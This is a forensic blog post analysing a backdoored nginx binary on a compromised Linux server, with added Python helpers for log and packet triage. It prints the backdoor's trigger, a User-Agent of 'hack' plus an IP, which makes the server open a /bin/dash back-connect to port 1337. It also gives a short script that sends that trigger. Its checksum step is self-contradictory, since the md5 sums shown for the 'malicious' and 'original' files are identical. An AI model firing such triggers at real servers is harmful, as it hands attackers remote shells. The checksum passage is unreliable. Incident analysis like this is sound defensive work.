Compromised Linux Server Forensic - Analyzing Uncommon Backdoor in HTTPD - Part 1
written by : Cr0security.com - Network Security Engineering Service | Server Hardening Service | Penetration Testing Service | Server Forensic Service | Software Engineering Service
Forewords

Recently we did an investigation on one of our client's Linux servers, which had been compromised. Something interesting we found in the httpd logs made us suspect that the attacker had backdoored the ELF binary of httpd (nginx-1.3.3). ELF (Executable and Linkable Format) is the binary format used on most Linux systems; those unfamiliar with ELF binaries may read http://en.wikipedia.org/wiki/Executable_and_Linkable_Format. On a compromised system the attacker may backdoor such an ELF binary. There are many methods of turning an ELF binary into a backdoor, but we do not cover them here.
The Backdoored nginx-1.3.3 Left by the Intruder
A malicious ELF binary is an ELF binary used for a malicious purpose, such as backdooring a server that has already been compromised. This short article demonstrates basic forensics, including a little of the reversing technique behind a malicious Linux ELF binary on a 32-bit machine running Linux. As our case study we will try to reveal a backdoored version of the nginx-1.3.3 ELF binary.
A simple way to check for a malicious ELF binary is to compare the md5 checksum of the suspected nginx ELF binary against that of a backup of the original ELF binary. This check is only meaningful if the backup is a trusted copy taken before the compromise.

md5 checksum of the malicious ELF binary:

#md5sum /usr/local/nginx/sbin/nginx
85da53d843fc19bff9a25c80ec08c3b3  /usr/local/nginx/sbin/nginx

and md5 checksum of the original ELF binary:

#md5sum /root/backup_of_original_nginx_elf_binary/nginx.old
85da53d843fc19bff9a25c80ec08c3b3  /root/backup_of_original_nginx_elf_binary/nginx.old
Basic Analysis, Getting to know what it does
As our basic check, we use strings to extract all runs of printable characters from the suspected malicious ELF binary and from the original ELF binary, then compare the two dumps with diff.

The malicious ELF binary's path is /usr/local/nginx/sbin/nginx, while the original ELF binary's path is /root/backup_of_original_nginx_elf_binary/nginx.

~#strings /usr/local/nginx/sbin/nginx > /root/forensic/strings_from_malicious_elf.txt
~#strings /root/backup_of_original_nginx_elf_binary/nginx > /root/forensic/strings_from_backup_elf.txt
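The checksum and strings comparison above can be scripted. As an added example that is not from the original post, the following Python code hashes two binaries, extracts their printable strings the way strings does, lists the strings present only in the suspect copy, and flags the ones a web server has no business containing. The two byte blobs are constructed stand-ins for the backup and the suspect nginx files, and the watchlist is my own choice.

```python
import hashlib
import re

# Constructed stand-ins for the backup and the suspect nginx files (not the
# real binaries from the investigation): the suspect copy carries extra strings.
ORIGINAL_ELF = (b"\x7fELF\x01\x01\x01" + b"\x00" * 9 + b"nginx version: nginx/1.3.3\x00"
                + b"\x90\x90\x90" + b"worker process\x00" + b"\xc3\x00\x11")
SUSPECT_ELF = (ORIGINAL_ELF + b"\x55\x89\xe5" + b"/bin/sh\x00" + b"execl\x00"
               + b"hack\x00" + b"1337\x00" + b"\xc9\xc3")
# Strings a web server binary has no reason to contain (my own watchlist).
WATCHLIST = ("/bin/sh", "/bin/dash", "execl", "hack", "1337")


def md5_hex(data):
    """MD5 of a file image, as printed by md5sum."""
    return hashlib.md5(data).hexdigest()


def printable_strings(data, min_len=4):
    """Mimic `strings`: runs of at least min_len printable ASCII bytes."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def strings_added(original, suspect):
    """Strings in the suspect binary that the original lacks (the '>' lines of
    a diff between the two strings dumps)."""
    base = set(printable_strings(original))
    return sorted(s for s in set(printable_strings(suspect)) if s not in base)


def triage(original, suspect):
    """Checksum first; if the copies differ, list the new strings and flag
    any that hit the watchlist."""
    identical = md5_hex(original) == md5_hex(suspect)
    added = [] if identical else strings_added(original, suspect)
    flagged = [s for s in added if any(w in s for w in WATCHLIST)]
    return {"identical": identical, "added": added, "flagged": flagged}


if __name__ == "__main__":
    report = triage(ORIGINAL_ELF, SUSPECT_ELF)
    print("md5 identical:", report["identical"])
    for s in report["added"]:
        print(("SUSPICIOUS  " if s in report["flagged"] else "new         ") + s)
```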
From the diff result we can pick out several strings that prove our nginx ELF binary has been backdoored, such as "1337", "execl", "hack" and "/bin/sh". The string "hack" appears to be related to entries in nginx's access log:

nginx's access log:
193.4.250.218 - - [08/Aug/2012:23:18:49 -0700] "GET / HTTP/1.1" 200 151 "-" "hack193.4.250.218"
Something uncommon about the entry above is its user agent: "hack193.4.250.218".
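A crafted User-Agent like the one above is easy to hunt for across a whole access log. As an added example that is not part of the original post, the following Python code parses nginx's combined log format and reports any request whose User-Agent is a bare word immediately followed by an IPv4 address. The log lines are constructed, with the first one reproducing the entry above; the regular expressions are my own.

```python
import re

# Constructed sample lines in nginx's combined log format; the first one
# reproduces the entry from the investigation, the others are benign traffic.
SAMPLE_LOG = """\
193.4.250.218 - - [08/Aug/2012:23:18:49 -0700] "GET / HTTP/1.1" 200 151 "-" "hack193.4.250.218"
10.0.0.5 - - [08/Aug/2012:23:19:02 -0700] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux i686) Firefox/14.0"
10.0.0.7 - - [08/Aug/2012:23:19:10 -0700] "GET /robots.txt HTTP/1.0" 404 169 "-" "curl/7.26.0"
"""

COMBINED = re.compile(
    r'(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# The marker seen in the log: a bare word immediately followed by a dotted
# quad. Real browsers and tools do not put an IP address in that position.
EMBEDDED_IP = re.compile(r"[A-Za-z]+(?P<ip>(?:\d{1,3}\.){3}\d{1,3})")


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def suspicious_agent(agent):
    """Return the IP embedded in a crafted User-Agent, or None if it looks normal."""
    m = EMBEDDED_IP.fullmatch(agent)
    if m and all(int(o) <= 255 for o in m.group("ip").split(".")):
        return m.group("ip")
    return None


def scan_log(text):
    """Return (client, agent, embedded_ip) for every request with a crafted User-Agent."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip = suspicious_agent(rec["agent"])
        if ip:
            hits.append((rec["client"], rec["agent"], ip))
    return hits


if __name__ == "__main__":
    for client, agent, ip in scan_log(SAMPLE_LOG):
        print("crafted User-Agent from %s: %r (embedded address %s)" % (client, agent, ip))
```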
Let's do more analysis at run time, looking at what is executed by nginx's worker process.

We will feed test input by setting the user agent to "hack193.4.250.218" with a simple Python script, to check whether we can observe anything happening in the nginx worker process.

fuzzme.py
#!/usr/bin/python
import urllib2

# Build an opener that sends the User-Agent seen in the access log
opener = urllib2.build_opener()
opener.addheaders = [('User-agent', 'hack193.4.250.218')]
# Send a single request to the local nginx instance
response = opener.open('http://localhost')
Back in our gdb session, we see that it executes /bin/dash; check this out:

At this point we may guess that it is possibly a back connect of /bin/dash to the IP 193.4.250.218. To make this clearer, let's make a small modification to the Python script, changing the string hack193.4.250.218 into hack127.0.0.1:
opener.addheaders = [('User-agent', 'hack127.0.0.1')]
and then do a capture using tcpdump:
#tcpdump -n -f -s 0 -X -vvv -i lo
Analyzing the tcpdump capture, we can see something interesting. The interesting part is:

127.0.0.1.35094 > 127.0.0.1.1337: Flags [S], cksum 0x4d22 (correct), seq 131492298, win 32792, options [mss 16396,nop,nop,TS val 1459556 ecr 0,nop,wscale 9], length 0
	0x0000:  4500 003c 2cae 4000 4006 100c 7f00 0001  E..<,.@.@.......
	0x0010:  7f00 0001 8916 0539 07d6 69ca 0000 0000  .......9..i.....
	0x0020:  a002 8018 4d22 0000 0204 400c 0101 080a  ....M"....@.....
	0x0030:  0016 4564 0000 0000 0103 0309            ..Ed........
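The fields tcpdump summarises can be confirmed directly from the hex columns. As an added example that is not part of the original post, the following Python code decodes the IPv4 and TCP headers (options included) of that SYN packet and checks whether it is a fresh connection attempt towards a given port. SYN_HEX is the packet above re-typed from the dump; the parsing code and the helper names are my own.

```python
import socket
import struct

# The SYN packet from the tcpdump output above, re-typed from its hex
# columns (60 bytes of the capture's own data, not a constructed packet).
SYN_HEX = (
    "4500003c2cae40004006100c7f000001"
    "7f0000018916053907d669ca00000000"
    "a00280184d2200000204400c0101080a"
    "001645640000000001030309"
)
FLAG_BITS = ((0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"), (0x08, "PSH"), (0x10, "ACK"))

def parse_tcp_options(opts):
    """Decode the options tcpdump prints as [mss ..., TS val ... ecr ..., wscale ...]."""
    out, i = {}, 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:                      # end of option list
            break
        if kind == 1:                      # NOP padding
            i += 1
            continue
        length = opts[i + 1]
        body = opts[i + 2:i + length]
        if kind == 2:
            out["mss"] = struct.unpack("!H", body)[0]
        elif kind == 3:
            out["wscale"] = body[0]
        elif kind == 8:
            out["tsval"], out["tsecr"] = struct.unpack("!II", body)
        i += length
    return out

def parse_ipv4_tcp(raw):
    """Return the IPv4/TCP fields a reviewer needs from one raw packet."""
    ver_ihl, _, total_len, _, _, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    if ver_ihl >> 4 != 4 or proto != 6:
        raise ValueError("not an IPv4/TCP packet")
    tcp = raw[(ver_ihl & 0x0F) * 4:total_len]
    sport, dport, seq, _, off_flags, win, _, _ = struct.unpack("!HHIIHHHH", tcp[:20])
    return {"src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
            "sport": sport, "dport": dport, "seq": seq, "win": win,
            "flags": [name for bit, name in FLAG_BITS if off_flags & bit],
            "options": parse_tcp_options(tcp[20:(off_flags >> 12) * 4])}

def is_new_connection_to(pkt, port):
    """True for a bare SYN, i.e. a connection attempt, towards the given port."""
    return pkt["flags"] == ["SYN"] and pkt["dport"] == port
```

Calling parse_ipv4_tcp(bytes.fromhex(SYN_HEX)) reproduces tcpdump's summary line: source port 35094, destination port 1337, flags [SYN], seq 131492298, win 32792 and the mss/timestamp/wscale options.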
We notice uncommon traffic to destination port 1337, which is a possible back connect attempt. To make it clearer, let's listen on local port 1337 and then execute fuzzme.py:

At this point we already know the purpose of this malicious ELF binary. Next we will do a more detailed analysis of this ELF binary.

To be continued ...